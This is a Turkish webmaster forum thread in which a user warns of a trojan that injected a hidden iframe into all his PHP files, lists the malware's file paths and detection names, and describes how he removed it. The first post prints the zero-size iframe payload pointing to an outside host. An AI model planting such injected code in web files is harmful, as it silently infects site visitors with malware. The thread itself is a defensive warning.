Türkiye'nin En Eski Webmaster Forumu İyinet'e Hoşgeldiniz!

Yeni Viruslere Dikkat Edelim.!!

DeviLLe

0
Onaylı Üye
Üye
Katılım
13 Kasım 2004
Mesajlar
594
Açılan Konu
35
Tepki puanı
0
Merhaba Arkadaşlar.
Yeni piyasaya yayılan viruslere dikkat edelim lütfen çok kötü sonuçlar doğurabiliyor.
Başıma geleni kısaca anlatayım.
1. Format bi işe yaramadı.
2. çoğu antivirus programı bir işe yaramadı.
3. tüm php uzantılı dosyalarıma aşağıdaki iframe kodu eklendi.

Aşağıdaki Liste Truva Atı nın isimleri ve yerleştiği yerler.

Bulaştığı anda pc nizde bulunan tüm php uzantılı dosyalarınıza iframe ile bi siteyi ekliyor eğer ftp ile hostunuza bunu atarsanız her giren kullanıcıya truva atı virusu bulaşıyor. çoğu programa yakalanmıyor.
Benim başım yandı sizde dikkatli olun derim.


Birde nasıl kurtulduğumu anlatayım kısaca belki yardımcı olmuş olurum.

güvenli kipte açtım önce orada tarama yapıp çıkanı karantina altına aldırdım.
normal kipe geçtim baktım ki bi faydası olmamış tekrar bunlar otomatik olarak çalışıyorlar.
yerlerini tespit ettiğim için gittim o klasöre önce CTRL+ALT+DEL yapıp işlemlerde gözüken 1.exe 2.exe ... gibi programları kapattım. ama burda hızlı olmalısınız hemen açılıyor tekrar.
kapattıktan sonra bu klasörde sırasıyla 1.exe nin üzerine sağ tıklayıp tara dedim ve virus olduğunu söyledi bana hemen tümünü sil dedim.
daha sonra diğerlerine de sırasıyla yaptım. ve şu son 3 gündür hiç bir şekilde açılmıyorlar. allah kimseye bulaştırmasın derim.

İsimleri ve Bulaştıkları Yerler Aşağıdadır.

C:\WINDOWS\system32\update\1.exe\[PESpin]
Win32:pepatch-Q [Trj]


C:\WINDOWS\system32\update\4.exe\[UPX]
Win32:Qqrob-BN [Trj]


C:\WINDOWS\system32\update\7.exe
Win32:Small-AMI [Trj]


C:\WINDOWS\system32\8.exe
Win32:Small-AMI [Trj]


UYARI : Aşağıdaki Linke Sakın Tıklamayın..
<iframe src="http://www.ac66.cn/88/index.htm" width="0" height="0" frameborder="0"></iframe>
 

CyberTurk

0
Onaylı Üye
Üye
Katılım
13 Mayıs 2005
Mesajlar
2,232
Açılan Konu
37
Tepki puanı
4
Konum
istanbul
Internet Explorer kullanmasaydınız bu virus bilgisayara yerleşmezdi. Bu şu anda yaygın bir exploit, yamasını cpanel yayınladı ama güncel olmayan cpanelli serverlerdeki sitelere IE ile girenleri etkiliyor
 

Teqin

0
Onaylı Üye
Üye
Katılım
30 Ağustos 2006
Mesajlar
625
Açılan Konu
42
Tepki puanı
0
Konum
IstanBuL
Sadece Internet Explorer mi ?
 

Mywedding

1
Onaylı Üye
Üye
Katılım
26 Eylül 2006
Mesajlar
5,893
Açılan Konu
426
Tepki puanı
88
Konum
www.odatv.com
mailden mi bulaşıyor yoksa site üzerindenmi...
 

Teqin

0
Onaylı Üye
Üye
Katılım
30 Ağustos 2006
Mesajlar
625
Açılan Konu
42
Tepki puanı
0
Konum
IstanBuL
siteden bulasıyorda sadece Internet Explorer olup olmadıgını bilmiyorum .. mozilla kulanıyorum ben bulasıyor bazen.
 

DeviLLe

0
Onaylı Üye
Üye
Katılım
13 Kasım 2004
Mesajlar
594
Açılan Konu
35
Tepki puanı
0
site üzerinden mailden heryerden bulaşabiliyor. çok tehlikelidir dikkat edin.
ayrıca ie veya ff veya diğerleri bilmem ama dikkatli olun derim. kurtulmak çok zor.
 
Üst